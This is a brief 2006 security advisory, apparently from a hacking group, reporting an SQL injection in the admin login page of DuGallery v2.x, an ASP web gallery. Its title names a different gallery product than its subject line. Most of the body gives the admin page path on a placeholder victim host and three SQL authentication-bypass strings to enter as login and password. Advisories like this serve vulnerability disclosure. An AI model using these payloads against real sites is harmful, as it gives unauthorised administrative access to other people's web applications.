Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

# MHG Security Team --- OzzyWork Gallery Upload Vulnerabilities

From:	Dj_ReMix_20_(at)_hotmail.com <Dj_ReMix_20_(at)_hotmail.com>
Date:	10.05.2006
Subject:	# MHG Security Team --- DuGallery V2.x SQL Injection

# Milli-Harekat Advisory ( www.milli-harekat.org )

# DUGaleri Admin SQL Injection

# Risk : High

# Script : DUGallery v2.x

# Credits : Dj ReMix

# Thanks : ßy Korsan , ESKOBAR , Poizonb0x , TR_IP , SariKamis

DuGallery Admin Page's www.victim.com/[DuGallery Path ]/admin_default.asp

Login and password :

'or'

'or"1=1'

'or"='


Bye !